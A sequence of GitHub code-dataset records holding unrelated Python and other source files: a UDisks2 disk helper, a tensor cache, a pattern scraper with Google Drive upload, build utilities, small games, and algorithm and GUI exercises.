\"/org/freedesktop/UDisks2/block_devices/%s\" % basename(device_path)\n\n def _get_block(self, device_path):\n obj_path = self._get_object_path(device_path)\n client = UDisks.Client.new_sync(None)\n dev = client.get_object(obj_path)\n return dev.get_block()\n\n def _get_filesystem(self, device_path):\n obj_path = self._get_object_path(device_path)\n client = UDisks.Client.new_sync(None)\n dev = client.get_object(obj_path)\n return dev.get_filesystem()\n\n def _get_partition(self, device_path):\n obj_path = self._get_object_path(device_path)\n client = UDisks.Client.new_sync(None)\n dev = client.get_object(obj_path)\n return dev.get_partition()\n\n def _get_drive(self, device_path):\n obj_path = self._get_object_path(device_path)\n client = UDisks.Client.new_sync(None)\n manager = client.get_object_manager()\n dev = client.get_object(obj_path)\n block = dev.get_block()\n if block is not None:\n drive_name = block.get_cached_property('Drive').get_string()\n drive_obj = manager.get_object(drive_name)\n if drive_obj is not None:\n return drive_obj.get_drive()\n return None\n\n def _unmount_filesystem(self, fs):\n try:\n return fs.call_unmount_sync(self.no_options, None)\n except:\n raise\n\n # Adapted from udisk's test harness.\n # This is why the entire backend needs to be its own thread.\n def _mount_filesystem(self, fs):\n mount_points = []\n if fs is not None:\n '''Try to mount until it does not fail with \"Busy\".'''\n timeout = 10\n while timeout >= 0:\n try:\n return fs.call_mount_sync(self.no_options, None)\n except GLib.GError as e:\n if 'UDisks2.Error.AlreadyMounted' in e.message:\n break\n elif not 'UDisks2.Error.DeviceBusy' in e.message:\n raise\n print('Busy.')\n time.sleep(0.3)\n timeout -= 1\n if timeout >= 0:\n mount_points = fs.get_cached_property('MountPoints').get_bytestring_array()\n else:\n raise\n if mount_points:\n return mount_points[0]\n else:\n return ''\n\n def get_drives(self):\n drives = []\n for d in self.devices:\n drive_path = self.get_drive_from_device_path(d)\n if exists(drive_path) and drive_path not in drives:\n drives.append(drive_path)\n return drives\n\n def get_drive_device_paths(self, drive=None):\n devices = []\n for d in self.devices:\n drive_path = None\n if drive is not None:\n drive_path = self.get_drive_from_device_path(d)\n if drive_path == drive:\n if exists(d) and d not in devices:\n devices.append(d)\n return devices\n\n def mount_device(self, device_path):\n fs = self._get_filesystem(device_path)\n if fs is not None:\n mount = self._mount_filesystem(fs)\n if mount != '':\n # Set mount point and free space for this device\n total, free, used = self.get_mount_size(mount)\n self.devices[device_path]['mount_point'] = mount\n self.devices[device_path]['free_size'] = free\n return mount\n return ''\n\n def unmount_device(self, device_path):\n if is_encrypted(device_path):\n unmount_partition(device_path)\n else:\n fs = self._get_filesystem(device_path)\n if fs is not None:\n return self._unmount_filesystem(fs)\n else:\n shell_exec(\"umount --force {}\".format(device_path))\n\n def unmount_drive(self, drive_path):\n for device_path in self.get_drive_device_paths(drive_path):\n self.unmount_device(device_path)\n\n def poweroff_drive(self, drive_path):\n try:\n for device_path in self.get_drive_device_paths(drive_path):\n drive = self._get_drive(device_path)\n if drive is not None:\n return drive.call_power_off_sync(self.no_options, None)\n except:\n raise\n\n def set_filesystem_label(self, fs, label):\n try:\n return fs.set_label_sync(label, self.no_options, None)\n except:\n raise\n\n def set_filesystem_label_by_device(self, device_path, label):\n fs = self._get_filesystem(device_path)\n if fs is not None:\n return self.set_filesystem_label(fs, label)\n return False\n\n def set_partition_bootable(self, partition):\n try:\n return partition.SetFlags(7, self.no_options)\n except:\n raise\n\n def set_partition_bootable_by_device_path(self, device_path):\n partition = self._get_partition(device_path)\n return self.set_partition_bootable(partition)\n\n def set_partition_label(self, partition, label):\n try:\n return partition.SetName(label, self.no_options)\n except:\n raise\n\n def set_partition_label_by_device_path(self, device_path, label):\n partition = self._get_partition(device_path)\n return self.set_partition_label(partition, label)\n\n # =================================================================\n # Useful non-udisks2 functions\n # =================================================================\n\n def get_drive_from_device_path(self, device_path):\n if '/dev/mapper' in device_path:\n if exists(device_path):\n status = get_status(device_path)\n device_path = status['device']\n else:\n device_path = device_path.replace('/mapper', '')\n return device_path.rstrip('0123456789')\n\n # returns total/free/used tuple (Kb)\n def get_mount_size(self, mount_point):\n try:\n st = os.statvfs(mount_point)\n except:\n return (0, 0, 0)\n total = (st.f_blocks * st.f_frsize) / 1024\n free = (st.f_bavail * st.f_frsize) / 1024\n used = ((st.f_blocks - st.f_bfree) * st.f_frsize) / 1024\n return (total, free, used)\n\n def get_uuid(self, partition_path):\n return getoutput(\"blkid -o value -s UUID {}\".format(partition_path))[0]\n\n def get_mount_point(self, partition_path):\n return getoutput(\"lsblk -o MOUNTPOINT -n %s | grep -v '^$'\" % partition_path)[0]\n\n def get_filesystem(self, partition_path):\n return getoutput(\"blkid -o value -s TYPE %s\" % partition_path)[0]\n\n def get_device_from_uuid(self, uuid):\n uuid = uuid.replace('UUID=', '')\n return getoutput(\"blkid -U {}\".format(uuid))[0]\n\n def get_label(self, partition_path):\n return getoutput(\"sudo blkid -o value -s LABEL %s\" % partition_path)[0]\n\n def get_luks_info(self, partition_path):\n mapper_path = ''\n mount_point = ''\n mapper = '/dev/mapper'\n mapper_name = getoutput(\"ls %s | grep %s$\" % (mapper, basename(partition_path)))[0]\n if not mapper_name:\n uuid = self.get_uuid(partition_path)\n if uuid:\n mapper_name = getoutput(\"ls %s | grep %s$\" % (mapper, uuid))[0]\n if mapper_name:\n mapper_path = join(mapper, mapper_name)\n if mapper_path:\n mount_point = self.get_mount_point(mapper_path)\n return (mapper_path, mount_point)\n","repo_name":"aalsabi/solydxk-system","sub_path":"usr/lib/solydxk/system/udisks2.py","file_name":"udisks2.py","file_ext":"py","file_size_in_byte":14626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"40555231311","text":"import gc\nimport mmap\nimport os\nfrom tempfile import mkstemp\n\nimport torch\n\n\nclass TensorCache:\n \"\"\"\n Temporary file containing a list of read-only tensors.\n\n The list can't be modified after reading from it.\n \"\"\"\n\n def __init__(self, dir=None):\n self.fd, name = mkstemp(dir=dir)\n # Automatically delete when the file descriptor is closed\n os.unlink(os.path.join(dir, name))\n\n self.map = None\n self.tensors = [] # (start, end, dtype, size)\n self.START, self.END, self.DTYPE, self.SIZE = 0, 1, 2, 3\n\n def append(self, tensor):\n assert self.map is None, \"Can't append tensors after reading from file\"\n\n start = self.tensors[-1][self.END] if len(self.tensors) > 0 else 0\n end = start + tensor.element_size() * tensor.numel()\n dtype, size = tensor.dtype, tensor.size()\n\n b = bytes(tensor.detach().cpu().contiguous().numpy())\n assert len(b) == end - start, (len(b), tensor.element_size(), tensor.numel())\n\n os.lseek(self.fd, start, os.SEEK_SET)\n os.write(self.fd, b)\n self.tensors.append((start, end, dtype, size))\n\n def cat_to_last(self, tensor):\n assert self.map is None, \"Can't concatenate to last tensor after reading from file\"\n assert len(self.tensors) > 0, \"No tensor to concatenate to\"\n\n last = self.tensors[-1]\n assert last[self.DTYPE] == tensor.dtype, (\n \"Must have same type\",\n last[self.DTYPE],\n tensor.dtype,\n )\n assert len(last[self.SIZE]) == len(tensor.size()), (\n \"Must have same number of dimensions\",\n last[self.SIZE],\n tensor.size(),\n )\n for dim in range(1, len(last[self.SIZE])):\n assert last[self.SIZE][dim] == tensor.size(dim), (\n \"Must have same shape in dimensions after first\",\n last[self.SIZE],\n tensor.size(),\n )\n cat_size = (last[self.SIZE][0] + tensor.size(0), *last[self.SIZE][1:])\n\n self.append(tensor)\n cat_end = self.tensors[-1][self.END] # Appended tensor end\n self.tensors.pop() # Un-append tensor\n self.tensors[-1] = (\n self.tensors[-1][self.START],\n cat_end,\n self.tensors[-1][self.DTYPE],\n cat_size,\n )\n\n def _map(self):\n if self.map is None:\n os.lseek(self.fd, 0, os.SEEK_SET)\n os.fsync(self.fd)\n self.map = mmap.mmap(self.fd, self.tensors[-1][self.END], access=mmap.ACCESS_READ)\n\n def __len__(self):\n return len(self.tensors)\n\n def __getitem__(self, i_tensor):\n \"\"\"Returns read-only tensor with appended data.\"\"\"\n\n self._map()\n info = self.tensors[i_tensor]\n tensor = torch.frombuffer(\n self.map[info[self.START] : info[self.END]], dtype=info[self.DTYPE]\n ).view(info[self.SIZE])\n return tensor\n\n def __iter__(self):\n # OPTIM\n for i in range(len(self.tensors)):\n yield self[i]\n\n def close(self):\n if self.map is not None:\n self.map.close()\n self.map = None\n\n os.close(self.fd)\n self.fd = None\n\n\nif __name__ == \"__main__\":\n print(torch.cuda.memory_allocated() / 1e6, \"x\")\n x = torch.ones(int(1e7), dtype=torch.float32, device=\"cuda\")\n\n print(torch.cuda.memory_allocated() / 1e6, \"c\")\n c = TensorCache(dir=\"./tmp\")\n\n print(torch.cuda.memory_allocated() / 1e6, \"append\")\n c.append(x)\n\n print(torch.cuda.memory_allocated() / 1e6, \"x = None\")\n x = None\n\n print(torch.cuda.memory_allocated() / 1e6, \"collect\")\n\n print(torch.cuda.memory_allocated() / 1e6, \"empty\")\n torch.cuda.empty_cache()\n\n print(torch.cuda.memory_allocated() / 1e6, \"x\")\n x = c[0].cuda()\n\n print(torch.cuda.memory_allocated() / 1e6, \"close\")\n c.close()\n\n print(torch.cuda.memory_allocated() / 1e6, \"c = None\")\n c = None\n\n print(torch.cuda.memory_allocated() / 1e6, \"collect\")\n\n print(torch.cuda.memory_allocated() / 1e6, \"exit\")\n","repo_name":"litvand/nic","sub_path":"cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":4071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38375545830","text":"T = int(input())\na = input().split()\nfor i in range(len(a)):\n a[i] = int(a[i])\nb = a.copy()\nb.sort()\n# print(a)\n# print(b)\nif(a == b):\n print('Yes')\nelse:\n print('No')\n","repo_name":"Md-Nur/Data-Structure-Algorithm","sub_path":"Toph.co/15_decentArrays.py","file_name":"15_decentArrays.py","file_ext":"py","file_size_in_byte":177,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"3281138710","text":"#!/usr/bin/env python\nimport logging\nfrom operator import itemgetter\nimport os\nimport re\nimport sys\nimport tempfile\n\nfrom apiclient.discovery import build\nfrom apiclient.http import MediaFileUpload\nfrom httplib2 import Http\nfrom oauth2client.client import AccessTokenCredentials\nimport requests\nfrom robobrowser import RoboBrowser\n\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\nconsole_handler = logging.StreamHandler()\nconsole_handler.setLevel(logging.INFO)\nlogger.addHandler(console_handler)\n\n\nclass DriveFolder(object):\n def __init__(self, folder_name):\n self.folder_name = folder_name\n\n self.logger = logger.getChild('DriveFolder')\n\n self.service = self._get_drive_service(self._get_access_token())\n\n self.folder = self.ensure_folder()\n self.log(\n logging.INFO, '__init__',\n 'Saving to folder ID {0}'.format(self.folder['id']))\n\n def log(self, level, method_name, message, *args, **kwargs):\n child_logger = self.logger.getChild(method_name)\n child_logger.log(level, message, *args, **kwargs)\n\n def upload_files(self, local_filenames):\n for file_name in local_filenames:\n self.log(\n logging.INFO, 'upload_files', 'Saving {0}'.format(file_name))\n\n self.remove_file_if_exists(file_name, 'application/pdf')\n remote_file = self.upload_file(file_name, 'application/pdf')\n self.move_to_parent(remote_file)\n\n self.log(\n logging.INFO, 'upload_files',\n 'Done with {0}'.format(file_name))\n\n def list_items(self):\n # Use the cached version of this list if available.\n if hasattr(self, '_items'):\n self.log(logging.INFO, 'list_items', 'Using cached list of items')\n return self._items\n\n # Get a list of all items this application has stored, traversing\n # paginated results as necessary.\n items = []\n resource = self.service.files()\n request = resource.list()\n while request is not None:\n page = request.execute()\n items.extend(page['items'])\n request = resource.list_next(request, page)\n\n # Cache and return the list.\n self.log(logging.INFO, 'list_items', 'Caching list of items')\n self._items = items\n return items\n\n def ensure_folder(self):\n # Look for a folder with the given name. If we find it, return it.\n folder_type = 'application/vnd.google-apps.folder'\n for item in self.list_items():\n if (\n item['mimeType'] == folder_type and\n item['title'] == self.folder_name):\n return item\n\n # If we're here, we haven't found one. Create one and return it.\n folder = self.service.files().insert(body={\n 'title': self.folder_name, 'mimeType': folder_type}).execute()\n return folder\n\n def remove_file_if_exists(self, file_name, mime_type):\n base_name = os.path.basename(file_name)\n for item in self.list_items():\n if item['title'] == base_name and item['mimeType'] == mime_type:\n self.service.files().delete(fileId=item['id']).execute()\n self.log(\n logging.INFO, 'remove_file_if_exists',\n 'Removed existing {0}'.format(base_name))\n return True\n return False\n\n def upload_file(self, file_name, mime_type):\n media_body = MediaFileUpload(\n file_name, mimetype=mime_type, resumable=True)\n base_name = os.path.basename(file_name)\n body = {\n 'description': base_name,\n 'title': base_name,\n 'mimeType': mime_type\n }\n response = self.service.files().insert(\n body=body, media_body=media_body).execute()\n self.log(logging.INFO, 'upload_file', 'Uploaded {0}'.format(file_name))\n return response\n\n def move_to_parent(self, file_to_move):\n file_to_move['parents'] = [self.folder]\n response = self.service.files().update(\n fileId=file_to_move['id'], body=file_to_move).execute()\n self.log(\n logging.INFO, 'upload_files',\n 'Moved {0}'.format(file_to_move['title']))\n return response\n\n def _get_access_token(self):\n r = requests.post(\n 'https://www.googleapis.com/oauth2/v3/token',\n data={\n 'client_id': os.environ['GOOGLE_CLIENT_ID'],\n 'client_secret': os.environ['GOOGLE_CLIENT_SECRET'],\n 'grant_type': 'refresh_token',\n 'refresh_token': os.environ['GOOGLE_REFRESH_TOKEN'],\n })\n return r.json()['access_token']\n\n def _get_drive_service(self, access_token):\n http = AccessTokenCredentials(\n access_token, 'stitchbot/1.0').authorize(Http())\n service = build('drive', 'v2', http=http)\n return service\n\n\nclass StitchBot(object):\n def __init__(self, output_path=None, username=None, password=None):\n self.browser = RoboBrowser(history=True)\n self.output_path = output_path or tempfile.TemporaryDirectory().name\n\n self.username = username or os.environ['STITCHBOT_USERNAME']\n self.password = password or os.environ['STITCHBOT_PASSWORD']\n\n self.logger = logger.getChild('StitchBot')\n\n def log(self, level, method_name, message, *args, **kwargs):\n child_logger = self.logger.getChild(method_name)\n child_logger.log(level, message, *args, **kwargs)\n\n def scrape(self):\n self.log(logging.INFO, 'scrape', 'Starting scrape')\n\n self.log_in()\n self.navigate_to_free_pattern()\n scraped_filenames = self.download_pattern()\n\n self.log(logging.INFO, 'scrape', 'Scrape complete')\n\n return scraped_filenames\n\n def log_in(self):\n self.log(logging.INFO, 'log_in', 'Logging in')\n\n self.browser.open('http://dailycrossstitch.com/my-account/')\n form = self.browser.get_form(class_='login')\n form['username'] = self.username\n form['password'] = self.password\n self.browser.submit_form(form)\n\n self.log(logging.INFO, 'log_in', 'Logged in')\n\n def navigate_to_free_pattern(self):\n self.log(\n logging.INFO, 'navigate_to_free_pattern', 'Finding free pattern')\n\n self.browser.open('http://dailycrossstitch.com/')\n free_button = self.browser.find('a', class_='button', string='FREE')\n self.browser.follow_link(free_button)\n\n self.log(\n logging.INFO, 'navigate_to_free_pattern', 'Found free pattern')\n\n def download_pattern(self):\n self.log(logging.INFO, 'download_pattern', 'Downloading pattern')\n\n download_buttons = self.browser.find_all(\n 'a', class_='single_add_to_cart_button')\n download_urls = list(map(itemgetter('href'), download_buttons))\n local_filenames = [\n self.download_pattern_file(url) for url in download_urls]\n\n self.log(logging.INFO, 'download_pattern', 'Downloaded pattern')\n\n return local_filenames\n\n def download_pattern_file(self, url):\n self.log(\n logging.INFO, 'download_pattern_file',\n 'Downloading pattern file at {0}'.format(url))\n\n self.browser.open(url)\n download_script = self.browser.find(\n 'script', string=re.compile(r'^\\s*function startDownload'))\n if not download_script:\n return\n\n pdf_url_match = re.search(r'(http.+\\.pdf)', download_script.string)\n if not pdf_url_match:\n return\n\n pdf_url = pdf_url_match.group(1)\n self.browser.open(pdf_url)\n\n output_filename = self.save_pattern(self.browser.response)\n\n self.log(\n logging.INFO, 'download_pattern_file',\n 'Downloaded pattern file at {0}'.format(url))\n\n return output_filename\n\n def save_pattern(self, response):\n self.log(logging.INFO, 'save_pattern', 'Saving pattern')\n\n try:\n os.makedirs(self.output_path)\n except OSError:\n pass\n\n filename = self.get_filename(response.headers)\n output_filename = os.path.join(self.output_path, filename)\n with open(output_filename, 'wb') as output_file:\n output_file.write(response.content)\n\n self.log(\n logging.INFO, 'save_pattern',\n 'Saved pattern to {0}'.format(output_filename))\n\n return output_filename\n\n def get_filename(self, headers, default_filename='pattern.pdf'):\n filename_match = re.search(\n r'filename=\"?([^\"]+)\"?', headers.get('Content-Disposition', ''))\n if not filename_match:\n return default_filename\n\n return filename_match.group(1)\n\n\ndef main(output_path=None, *args):\n local_filenames = StitchBot(output_path).scrape()\n DriveFolder('Stitchbot patterns').upload_files(local_filenames)\n\n\nif __name__ == '__main__':\n main(*sys.argv[1:])\n","repo_name":"myersjustinc/stitchbot","sub_path":"stitchbot.py","file_name":"stitchbot.py","file_ext":"py","file_size_in_byte":9033,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"} +{"seq_id":"25945862664","text":"from __future__ import print_function, unicode_literals\n\nimport errno\nimport os\nimport re\nimport shutil\nimport subprocess\nimport sys\nimport tarfile\nimport tempfile\nfrom contextlib import contextmanager\n\n\nif sys.platform.startswith(\"linux\"):\n sys.platform = \"linux\"\n\n\n# From https://stackoverflow.com/a/19445241/262432\nif sys.platform in [\"cygwin\", \"win32\"]:\n _bltn_open = tarfile.bltn_open\n\n def safe_path(path):\n if not os.path.isabs(path):\n path = os.path.join(os.getcwd(), path)\n\n # http://msdn.microsoft.com/en-us/library/aa365247%28v=vs.85%29.aspx#maxpath\n if len(path) >= 200:\n path = \"\\\\\\\\?\\\\\" + os.path.normpath(path)\n return path\n\n def long_bltn_open(name, *args, **kwargs):\n return _bltn_open(safe_path(name), *args, **kwargs)\n\n tarfile.bltn_open = long_bltn_open\n\n\n@contextmanager\ndef cd(path):\n cwd = os.getcwd()\n os.chdir(path)\n print(\"cd \" + path)\n try:\n yield path\n finally:\n os.chdir(cwd)\n\n\ndef sed_inplace(path, pattern, sub, regex=False):\n \"\"\"Replaces all occurences of ``pattern`` in a file with ``sub``.\n\n A file is modified **in-place**.\n \"\"\"\n print(\"s/{}/{}/ in file {}\".format(pattern, sub, path))\n with open(path, \"r\") as input:\n with tempfile.NamedTemporaryFile(\"w\", delete=False) as output:\n for line in input:\n output.write(line.replace(pattern, sub) if not regex else\n re.sub(pattern, sub, line))\n\n shutil.copyfile(output.name, path)\n\n\ndef run(command, **kwargs):\n print(command)\n return subprocess.check_call(command, shell=True, **kwargs)\n\n\ndef maybe_makedirs(path):\n print(\"mkdir -p \" + path)\n try:\n os.makedirs(path)\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise\n","repo_name":"criteo-forks/xgboost-jars","sub_path":"_internal.py","file_name":"_internal.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"19"} +{"seq_id":"1343999605","text":"def solution(n, edge):\n graph = [[] for _ in range (n + 1)]\n distance = [-1 for _ in range(n + 1)]\n for v in edge:\n a, b = v\n graph[a].append(b)\n graph[b].append(a)\n now = [1]\n next = []\n distance[1] = 0\n d = 0\n while now:\n for n in now:\n for i in graph[n]:\n if distance[i] == -1:\n next.append(i)\n distance[i] = d + 1\n now = next.copy()\n next = []\n d += 1\n return distance.count(max(distance))\n\n\"\"\"\nBFS를 통해서 1번과 각 노드들의 거리를 구한다.\n최대 거리인 노드들이 몇개인지 카운트하여 리턴한다.\n\"\"\"","repo_name":"ORANZINO/Algorithm","sub_path":"Programmers/가장 먼 노드.py","file_name":"가장 먼 노드.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"25012112552","text":"import argparse\n\nfrom config import MAX_REQUESTS\n\ndef str2bool(value):\n if value.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif value.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise argparse.ArgumentTypeError('Boolean value expected.')\n\ndef check_max_requests(value):\n ivalue = int(value)\n if ivalue not in MAX_REQUESTS:\n raise argparse.ArgumentTypeError(\"%s is an invalid max request value\" % value)\n return ivalue","repo_name":"chanb/MeLeCaR","sub_path":"utils/parser_util.py","file_name":"parser_util.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71052758123","text":"import os.path\nimport Fs.driver\nfrom nut import Print\n\nclass FileContext(Fs.driver.FileContext):\n\tdef __init__(self, url, sz, mode, parent):\n\t\tsuper(FileContext, self).__init__(url, sz, mode, parent)\n\t\tif sz:\n\t\t\tself.size = sz\n\t\telse:\n\t\t\tself.size = os.path.getsize(self.url)\n\t\tself.handle = open(self.url, self.mode)\n\n\tdef close(self):\n\t\tif self.handle:\n\t\t\tself.handle.close()\n\t\t\tself.handle = None\n\n\tdef read(self, sz=None):\n\t\treturn self.handle.read(sz)\n\n\tdef chunk(self, callback, offset=None, size=None):\n\t\tchunkSize = 0x100000\n\n\t\tif offset is not None:\n\t\t\tself.handle.seek(int(offset), 0)\n\n\t\t\tif size is None:\n\t\t\t\tsize = self.size - offset\n\t\telif size is None:\n\t\t\tsize = self.size\n\n\t\tr = self.handle\n\n\t\ti = 0\n\n\t\ttry:\n\t\t\twhile True:\n\t\t\t\tchunk = r.read(min(size-i, chunkSize))\n\n\t\t\t\tif not chunk:\n\t\t\t\t\tbreak\n\n\t\t\t\ti += len(chunk)\n\n\t\t\t\tcallback(chunk)\n\t\texcept BaseException as e:\n\t\t\tPrint.info('native chunk exception: ' + str(e))\n\nclass DirContext(Fs.driver.DirContext):\n\tdef __init__(self, url, parent):\n\t\tsuper(DirContext, self).__init__(url, parent)\n\n\tdef ls(self):\n\t\tentries = []\n\t\tfor f in os.listdir(self.url):\n\t\t\tpath = os.path.join(self.url, f)\n\t\t\tif os.path.isfile(path):\n\t\t\t\tentries.append(Fs.driver.FileEntry(path, os.path.getsize(path)))\n\t\t\telse:\n\t\t\t\tentries.append(Fs.driver.DirEntry(path))\n\t\treturn entries\n\n\nclass Native(Fs.driver.Interface):\n\tdef __init__(self, url=None):\n\t\tsuper(Native, self).__init__(url)\n\t\tself.dirContextType = DirContext\n\t\tself.fileContextType = FileContext\n\n\nFs.driver.registry.add('', Native)\n","repo_name":"blawar/nut","sub_path":"Fs/driver/native.py","file_name":"native.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":997,"dataset":"github-code","pt":"19"} +{"seq_id":"33831761824","text":"import pygame\nfrom classes import *\nimport random\nimport time\nfrom pygame.locals import *\nali = False\nmiss = False\nmisarr1 = []\nmisarr2 = []\nalienarr1 = []\nscore = [0]\n\n\ndef shoot1(left, top):\n shot = Mis1(left, top - 100)\n misarr1.append(shot)\n\n\ndef shoot2(left, top):\n shot = Mis2(left, top - 100)\n misarr2.append(shot)\n\n\ndef createalien():\n x = random.randint(1, 8) * 100\n y = random.randint(0, 1) * 100\n z = time.time()\n alien = Alien1(x, y, z)\n alienarr1.append(alien)\n\n\ndef delalien():\n z = time.time()\n for x in alienarr1:\n if z - x.time > 7:\n alienarr1.pop(alienarr1.index(x))\n\n\ndef collision():\n for x in alienarr1:\n for y in misarr1:\n if x.left == y.left and x.top == y.top:\n score[0] += 10\n if x not in alienarr1:\n pass\n else:\n alienarr1.remove(x)\n misarr1.remove(y)\n\n for x in alienarr1:\n for y in misarr2:\n if x.left == y.left and x.top >= y.top:\n x.image = pygame.image.load(\"alien2.jpg\")\n x.time += 5\n misarr2.pop(misarr2.index(y))\n","repo_name":"ayushshivani/Space-Invader","sub_path":"function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"17537587165","text":"import json\n\ndef main():\n\t\n\ttotalString = \"\";\n \n\twith open(\"MouseBindingsSettings.json\") as mouseBindingsSettingsFile:\n\t\tmouseBindingsSettings = json.load(mouseBindingsSettingsFile)\t\n \n\t\tfor i in range(1, 13):\n\t\t\tbuttoniString = f\"\"\"\n; button {i}\nWinGet, procName, ProcessName, A\n\nswitch currentMode\n{{\n\"\"\"\n\t\t\tfor mode, modeActions in mouseBindingsSettings.items():\n\t\t\t\tif (mode == \"default\"):\n\t\t\t\t\tcontinue; # covering default at the end with its own case\n\n\t\t\t\tif (len(modeActions[str(i)])):\n\t\t\t\t\tbuttoniString = addAction(buttoniString, modeActions[\"name\"], mode, modeActions[str(i)])\n\t\t\t\t\t\n\t\t\t\n\t\t\tdefaultActions = mouseBindingsSettings[\"default\"][str(i)]\n\n\t\t\tif (len(defaultActions) > 1): # different default actions in different programs\n\t\t\t\tbuttoniString += \"\"\"\n\n\tdefault:\n\t\tswitch procName\n\t\t{\n\"\"\"\n\t\t\t\tfor action, actionList in defaultActions:\n\t\t\t\t\tif action == \"default\":\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t\n\t\t\t\t\tbuttoniString += f\"\\n\t\t\tcase {action}: {actionList[0]}\\n\t\treturn\"\n\n\n\t\t\telse:\n\t\t\t\tbuttoniString += f\"\"\"\n\n\tdefault:\n\t\t{defaultActions[\"default\"][0]}\n\"\"\"\n\n\t\t\tbuttoniString += \"}\"\n\n\t\t\ttotalString += f\"onButton{i}(currentMode)\\n{{\\n{buttoniString}\\n}}\\n\\n\"\n\n\twith open(\"MouseBindingsTemplate.ahk\") as template:\n\t\twith open(\"MouseBindings.ahk\", \"w\") as output:\n\t\t\toutput.write(template.read())\n\t\t\toutput.write(\"\\n\")\n\t\t\toutput.write(totalString)\n \n\ndef addAction(buttoniString, modeName, modeNum, actions):\n\tif (len(actions) > 1 or \"default\" not in actions): # different default actions in different programs\n\t\tbuttoniString += f\"\"\"\n\n\tcase {modeNum}: ; {modeName}\n\t\tswitch procName\n\t\t{{\n\"\"\"\n\t\tfor action, actionList in actions.items():\n\t\t\tif action == \"default\":\n\t\t\t\tcontinue\n\t\t\t\t\t\n\t\t\tbuttoniString += f\"\\n\t\t\tcase \\\"{action}\\\": {actionList[0]}\\n\t\treturn\"\n\n\t\tif \"default\" in actions:\n\t\t\tbuttoniString += f\"\"\"\n\n\tdefault:\n\t\t{actions[\"default\"][0]}\n\"\"\"\n\t\tbuttoniString += \"\\n}\"\n\n\tif \"default\" in actions:\n\t\tbuttoniString += f\"\"\"\n\n\tcase {modeNum}: ; {modeName}\n\t\t{actions[\"default\"][0]}\n\t\treturn\n\"\"\"\n\t\n\treturn buttoniString\n\n\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"Talia-12/AutoHotKeyFiles","sub_path":"QoL/generate_MouseBindings.py","file_name":"generate_MouseBindings.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71351081963","text":"def manhattan(pos):\n return abs(pos[0]) + abs(pos[1])\n\ndef storePos(path):\n positions = {}\n x = 0\n y = 0\n steps = 0\n for item in path:\n direction = item[0]\n amount = int(item[1:])\n for i in range(amount):\n if direction == 'U': y += 1\n elif direction == 'D': y -= 1\n elif direction == 'R': x += 1\n elif direction == 'L': x -= 1\n steps += 1\n pos = (x,y)\n if pos not in positions: # only store first time reached\n positions[pos] = steps\n return positions\n\n\nwith open(\"input.txt\", 'r') as f:\n w1 = f.readline().strip().split(',')\n w2 = f.readline().strip().split(',')\n\n\nwire1 = storePos(w1)\nwire2 = storePos(w2)\ncross = set(wire1.keys()).intersection(set(wire2.keys()))\n\n\nleastSteps = float('inf')\n\nfor position in cross:\n if wire1[position] + wire2[position] < leastSteps:\n leastSteps = wire1[position] + wire2[position]\n intersection = position\nprint(\"Least amount of steps to intersection %s is %d steps\" %(intersection, leastSteps))\n","repo_name":"kazemicode/AdventOfCode","sub_path":"2019/3/day3-part2.py","file_name":"day3-part2.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"33954399020","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jul 3 19:14:06 2020\r\n\r\n@author: kpurc\r\nhttps://realpython.com/python-gui-tkinter/\r\nhttps://effbot.org/tkinterbook/entry.html\r\nhttps://www.delftstack.com/howto/python-tkinter/how-to-change-tkinter-button-color/\r\nhttps://www.python-course.eu/tkinter_entry_widgets.php\r\n\"\"\"\r\n\r\nstatement = \"Hi from Tkinter!\"\r\n\r\nimport tkinter as tk\r\n\r\nwindow = tk.Tk()\r\nwindow.configure(bg='white')\r\n\r\nframe_a = tk.Frame()\r\ngreet_frame = tk.Frame()\r\nname_frame = tk.Frame()\r\n\r\ngreeting = tk.Label(master=greet_frame, text=statement, fg =\"white\", bg=\"black\", width='20', height='10')\r\n#width and height by text units each the size of '0'\r\ngreeting.pack()\r\n\r\n\r\nget_name = tk.Label(master=name_frame,text='Enter your name', fg='white', bg='#875bd1', width='20', height='3', font=\"Georgia\")\r\nget_name.pack()\r\n\r\nentry = tk.Entry(master=name_frame, fg=\"white\", bg='black', width='20', font=\"Georgia\")\r\ndef callback(event):\r\n name = entry.get()\r\n your_name = tk.Label(master=name_frame, text=('Your name is '+name), bg=\"#b397e2\", font=\"Georgia\", width='20')\r\n your_name.pack()\r\nentry.bind(\"\", callback)\r\nentry.pack()\r\n\r\n'''\r\nthis is a little more complicated so the above way is better I think, but this still works\r\nentry = tk.Entry(master=name_frame, fg=\"white\", bg='black', width='20')\r\nentry.pack()\r\n\r\ndef callback():\r\n name = entry.get()\r\n your_name = tk.Label(master=name_frame, text=('Your name is: '+name), bg=\"white\")\r\n your_name.pack()\r\n\r\n\r\nget = tk.Button(master=name_frame, text='Enter',command=callback, 